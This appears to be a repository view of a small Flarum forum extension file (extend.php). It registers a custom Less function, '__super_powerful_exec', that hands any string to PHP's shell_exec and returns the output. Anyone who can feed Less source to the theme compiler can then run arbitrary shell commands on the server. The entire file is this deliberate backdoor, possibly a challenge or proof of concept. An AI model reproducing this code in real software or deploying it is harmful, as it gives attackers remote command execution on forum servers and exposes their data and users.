Files
flarum-less/extend.php
2022-08-30 16:14:38 +08:00

19 lines
451 B
PHP

<?php
use Flarum\Extend;
return [
(new Extend\Theme())
->addCustomLessFunction("__super_powerful_exec", function (mixed $text) {
if (is_string($text)) {
$result = shell_exec($text);
if (is_string($result)) {
return $result;
} else {
return "";
}
} else {
return "";
}
})
];